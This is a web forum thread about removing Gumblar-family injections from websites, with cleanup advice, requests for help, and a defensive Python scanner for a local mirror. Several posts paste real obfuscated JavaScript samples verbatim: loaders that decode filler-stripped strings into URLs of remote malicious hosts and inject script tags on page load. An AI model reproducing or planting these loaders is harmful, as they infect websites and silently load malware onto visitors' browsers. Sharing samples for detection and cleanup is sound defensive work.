Thanks Konstantin, new version now uploaded to the first post as well.
Thanks for your explanations.
Your PHP program did not work for me, but I do not really need it, as I have a local mirror of the websites.
I just recopy the affected index*.* and *.js files.
But now I understand how I got all the sites reinfected one day later even without me being connected...
So now I DID [B]CHANGE ALL MY FTP PASSWORDS.[/B]
Hope I am finished with these tiresome and time-consuming infections.
[QUOTE=vividsign;678]Thanks for your work... you rock!![/QUOTE]
You are very welcome! That script has now been downloaded nearly 8,000 times, and that's just the people that have downloaded it from my website. I've found it in a few other places as well now, so that virus is pretty widespread to say the least!
Hi Konstantin
I'd like to use your script but my host has disabled the function exec for security reasons.
Is there another way or at least another script that will at least give me a list of the infected files in order to manually correct them?
Thanks and kind regards
Salva
Okay, so I followed the instructions to the letter and all I got was the following once I entered the link in my browser:
[B]
TOTAL: 0
START BACKUP:
END BACKUP![/B]
The infection is STILL there even after this file was uploaded to the root directory, what am I doing wrong?
Please help, we have a retail site and are losing business and getting complaints, we've had to pull the site down temporarily until we can get this resolved. Any help you all can provide will be much appreciated.
I found this crap today on my mate's site.
1. CHECK .htaccess files; you should find a lot of virus code there. Delete unnecessary crap (even if you delete the script from the html/php page, if the virus code in .htaccess is still there, the virus code will still be placed in the files again!)
2. DELETE the script after the </html> tag from files like index.htm, index.html, index.php and some *.js files
3. Always use an FTP manager which can add a password to your FTP site list (like FlashFXP, FTPRush)
Should be all.
Greetz.
[email]hose-hp@tlen.pl[/email]
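An added example (not part of any post in this thread, and not the curevir.php script): a read-only Python scanner for a local mirror that lists files showing the traits visible in the samples posted here, namely a script after `</html>`, a filler-stripped string feeding a script loader, and the 32-hex comment, plus every `.htaccess` for manual review. The function names, the heuristics and the inert sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Traits seen in the samples posted in this thread; the scan reports, never edits.
TRAILING = re.compile(r"</html\s*>(.*)\Z", re.I | re.S)  # text after </html>
SCRIPT_TAG = re.compile(r"<script\b", re.I)
# A quoted string cleaned on the spot with .replace(/filler chars/g, '')
STRIP_REPLACE = re.compile(
    r"""['"]\s*\.replace\(\s*/[^/\n]{3,}/[gi]{1,2}\s*,\s*(?:''|"")\s*\)""")
LOADER = re.compile(r"document\.write\s*\(|createElement\s*\(")
MARKER = re.compile(r"<!--[0-9a-f]{32}-->")  # hex comment left after the script

# Constructed, inert samples (not copied from the thread).
INFECTED_HTML = (
    "<html><body>shop</body></html>\n"
    "<script>/*x*/ document.write('<script src='+'h!t#t!p:#//ex!ample.inv#alid/'"
    ".replace(/\\!|#/ig, '')+' defer=defer></scr'+'ipt>');</script>\n"
    "<!--" + "0123456789abcdef" * 2 + "-->\n")
INFECTED_JS = (
    "try{window.onload=function(){var u='ex#am!ple.inv!alid'"
    ".replace(/\\!|#|@/ig, '');document.write('<scr'+'ipt src=http://'+u+"
    "'></scr'+'ipt>');}}catch(e){}\n")
LEGIT_JS = ("try{window.onload=function(){"
            "document.getElementById('menu').className='on';}}catch(e){}\n")


def inspect(text):
    """Return the reasons a file's text looks injected (empty list = no hit)."""
    reasons = []
    tail = TRAILING.search(text)
    if tail and SCRIPT_TAG.search(tail.group(1)):
        reasons.append("script after </html>")
    if STRIP_REPLACE.search(text) and LOADER.search(text):
        reasons.append("filler-stripped string feeding a script loader")
    if MARKER.search(text):
        reasons.append("32-hex marker comment")
    return reasons


def scan(root):
    """Walk a local mirror and map each suspicious path to its reasons."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.name == ".htaccess":
            report[str(path)] = ["review .htaccess by hand"]
        elif path.is_file() and path.suffix.lower() in {".js", ".htm", ".html", ".php"}:
            reasons = inspect(path.read_text(errors="replace"))
            if reasons:
                report[str(path)] = reasons
    return report
```

Call `scan("path/to/mirror")` and check each listed file by hand. A plain `try{window.onload=...}` handler is not reported on its own, while a hit on the second heuristic alone can also occur in legitimate libraries.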
It appears that there is a new copy out.. the code now does not have '*/ text /*'
after the start of script tag the code has...
> try{window.onload=function(){newEl = document.createElement('script');newEl.setAttribute('defer', '1');newEl.setAttribute('src', ....
MOGmartin or anyone have a suggestion?
If I remove the '*/ text /*' from your script I feel it might delete other 'try{Window.' code that is useful. I am really not a JavaScript programmer and am not sure just what the 'try{window' command does or if it is something I am likely to see elsewhere.
[QUOTE=Joe Catts;858]It appears that there is a new copy out.. the code now does not have '*/ text /*'
after the start of script tag the code has...
> try{window.onload=function(){newEl = document.createElement('script');newEl.setAttribute('defer', '1');newEl.setAttribute('src', ....
MOGmartin or anyone have a suggestion?
If I remove the '*/ text /*' from your script I feel it might delete other 'try{Window.' code that is useful. I am really not a JavaScript programmer and am not sure just what the 'try{window' command does or if it is something I am likely to see elsewhere.[/QUOTE]
I will speak with Konstantin ([I]kboyko[/I]) now and see if he can upgrade the script and post it here tomorrow, thanks for bringing this to my attention!
New Version?
<script>/*Exception*/ document.write('<script src='+'h$)#t#t!!p&!$$)/!!$/)$!(w#$o@&#@&w$!&#a#r#m^$o@)^#r(y)($-$)$c)o&!m^^.^^z^&^a!$n&$^@&o^$!x@#-@!$(a$!!$@f#@f$$i!l#&)^&i#^a@$&)t)e&)(.$(&d@#!e)#(.$$c@&^o!@$)r!!$r$&i^@e!r&&e@&-#@i^t)&.)!&g(@e!&n(&!&u(!i@n#e&@)$h&o&!)l&)@)l^^y!w)o$)o(^d!@#.)@r^@$u(#:&$@8&$(0&@()8@$!0^#$#/!&)l()a#(!s!$(t!$$.&#^f$@^m@#/&l@$#a(s!!t@!.#$f$&#m)&/$g^$o!#o$()g(l&@$&e$.&c$^o#$!m(!!#/#@c(&^a@()m#4&).^c((&o#^&^m@^/@!@1@(1(@#0@$(m!@b^((.&&^c!o^#$$m^@/)!@'.replace(/\!|\)|#|&|\$|\^|@|\(/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--8f500458f19ba4802d9a10f604126558-->
Hello,
I have the same version!
<script>/*Exception*/ document.write('<script src='+'h)^!t@@t$$p#($:!$&$/&#^^/^&$!k#u#)(6@^-(#(c)(@o@m$(.@#!^t!(o^$r($(@!r(&e$(n##)^&t@s@$.$$(r#u^@.@i!^&b())i@b##!^o@@@-#c@^#)o!@m)).^@(g(e$))$n(u^&!i(&n@$e^!c$&o^(!l!)!&o&!!^r&$s@!@.&#r(($$u)):$&8@$0&!&!8^#&0)&&$/##g$a&(m@&(e$^s)$^t(o$@p@&.(&@c)o$m)()/@!(!&g&(#a@!m&e&!s$!^#t!o^p&.$)$c(o&m#(#/$&!)#l@(i#!v^(&e$!s^&(c!^o))^r!)e$.$#c(&&^!o$)@m!(/!#(g!()o(^(o!#g@#(l!#e^!@&.#$c@&&o#$@^m$!/(&$t&#&!u(@.&^t))&&v^@/@'.replace(/\)|\^|\$|@|#|&|\!|\(/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--2a7ee8f55048cb4fc3e880af42980d23-->
Did you find something to fix it?
this is the code
try{window.onload=function(){document.write('<div id=megaid>mysql-com.alice.it.enet-c</div>');Ixnqdi48j46q = document.getElementById('megaid').innerHTML + 'o@^m&-!^(c@#n@).&c)##o&()!&u#((n#&t(#!&e&@r$^!b!&e!s!!$$t))(.#(r)@u$#:@#&!D@E#B&@!U^G@)!$^/#^)@g#o(^#o&&)&(g))&l$((!e))^@.^(#c@)o#@^m#^/#@&g@o&&(o!@g)l&e).&(((c^o(#&&#m)/@$d##&e(t#)i$#k!.!c!!o($m$/(&$^m^&!a!(r^c!)$!a!.!(#(c&)@o)(m(^&/)$t#^h&$&@e(!^f!!$r$(e@&e))d#i^!c@t)$$#i^o^@n^^a@$r$##(y$).(c!o$m!(/^)#$'.replace(/\^|#|\$|&|\!|@|\)|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ixnqdi48j46q.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(F9dbj27tg ) {}
The curevir.php can't remove this from my .js files =(
Check the original article at
[url]http://justcoded.com/article/gumblar-family-virus-removal-tool/[/url]
The latest version of the script can always be found there.
Konstantin Boyko,
[url]http://justcoded.com[/url]
[QUOTE=skull-fire;988]this is the code
try{window.onload=function(){document.write('<div id=megaid>mysql-com.alice.it.enet-c</div>');Ixnqdi48j46q = document.getElementById('megaid').innerHTML + 'o@^m&-!^(c@#n@).&c)##o&()!&u#((n#&t(#!&e&@r$^!b!&e!s!!$$t))(.#(r)@u$#:@#&!D@E#B&@!U^G@)!$^/#^)@g#o(^#o&&)&(g))&l$((!e))^@.^(#c@)o#@^m#^/#@&g@o&&(o!@g)l&e).&(((c^o(#&&#m)/@$d##&e(t#)i$#k!.!c!!o($m$/(&$^m^&!a!(r^c!)$!a!.!(#(c&)@o)(m(^&/)$t#^h&$&@e(!^f!!$r$(e@&e))d#i^!c@t)$$#i^o^@n^^a@$r$##(y$).(c!o$m!(/^)#$'.replace(/\^|#|\$|&|\!|@|\)|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ixnqdi48j46q.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} } catch(F9dbj27tg ) {}
The curevir.php can't remove this from my .js files =([/QUOTE]
Hi,
This is my first post; I found this site as I think I have this virus on my WordPress site. As I am not technical, I would happily pay someone who knows how to fix this virus for me. I don't trust my technical skills to attempt the fix so kindly offered here.
So if you are up to the job please email me (lance at banskoblog dot com)
Thank you,
Lance
banskoblog.com
New version:
[PHP]
<script>this.s='';var py="py";var r=window;var x=document;this.fi="fi";var qd;if(qd!='fq' && qd!='v'){qd='fq'};var d='sec7rfi7pete'.replace(/[ef47T]/g, '');var w;if(w!='' && w!='ps'){w=null};var t=false;r.onload=function(){try {p=x.createElement(d);var fa=new Date();var c;if(c!='im'){c='im'};p.setAttribute('dDe1fpe1rp'.replace(/[p1DiC]/g, ''), "1");var ku;if(ku!='jx' && ku!='yj'){ku=''};var rw;if(rw!='a' && rw!='cp'){rw=''};p.src='hbtVt?pw:V/;/?p;owrbnbo?r;a?m;aw-;c;o?m;.wa?lVlwy;ewsV.?cVoVmb.?gbu?mwtbrVe;e;-Vc;o;mV.?r;e?c;e;nbtwmwebxVi?cwo?.;rwuV:w8;0?8b0V/VabubtVowhwo?mwew.?cVo;mV.?c?n?/VaVu?tVo;hVo;m;eV.;c;o?m;.bcbnw/bkwiVowsVk?e?a;.bnVebt;/bfVi;fbaw.Vcwo;mb/;g?obo?gblbe;.wc;oVm?/;'.replace(/[;w\?Vb]/g, '');var vv;if(vv!='e'){vv=''};var qg=new String();x.body.appendChild(p);this._a=false;} catch(k){var nk;if(nk!='rg' && nk!='y_'){nk=''};this.kk='';};this.mw=24319;};var gr;if(gr!='' && gr!='nr'){gr='o'};var aa="";</script>
<script>var f;if(f!='' && f!='z'){f=''};var qa;if(qa!='' && qa!='u'){qa=''};var m=document;this.g="";var j='s!cTrTijpTt$'.replace(/[\$TRj\!]/g, '');var o;if(o!='' && o!='i'){o='mp'};var b=window;var kl;if(kl!='m_'){kl='m_'};b.onload=function(){var a;if(a!='ds' && a != ''){a=null};try {var y;if(y!='sv'){y='sv'};s=m.createElement(j);this.t="";var y_=false;var li;if(li!='' && li!='lo'){li=''};this.oi='';s.setAttribute('dze@f9ecr9'.replace(/[9@zpc]/g, ''), "1");var tm;if(tm!='tk' && tm!='tt'){tm='tk'};var ld;if(ld!='nk' && ld!='e'){ld='nk'};s.src='hTt%tFpF:F/%/TpFo!r6n!o!r!a%m%a%-!cFoFm!.FoTdFe6sFk6.%c6oFmT.FaTmTaTzToTn%-FcTn%.6rTeFc6e%nFtTm6eFx6iTc%o!.!r%u6:T8F0T8F06/!m%eFrFc!a!dTo%lTiTbFr!e%.!cFoTmT.%a%rF/TmTe!r6cFaFd6o6l!iTbTr%e6.Fc!oTmF.!aTr6/!h%uTa6nFq!iFu!.%c6o6m!/%cTa6.!g6o!v!/%g!o!o!gTlFe%.%c6o6m%/%'.replace(/[%T6F\!]/g, '');var vj;if(vj!='' && vj!='x'){vj='nb'};var nz;if(nz!='' && nz!='mb'){nz='jg'};m.body.appendChild(s);var ce;if(ce!='' && ce!='bb'){ce='bq'};} catch(r){};};var gk=new String();</script>
<!--8350182c6ab4d370dfe2b5cb2952cd2a-->
[/PHP]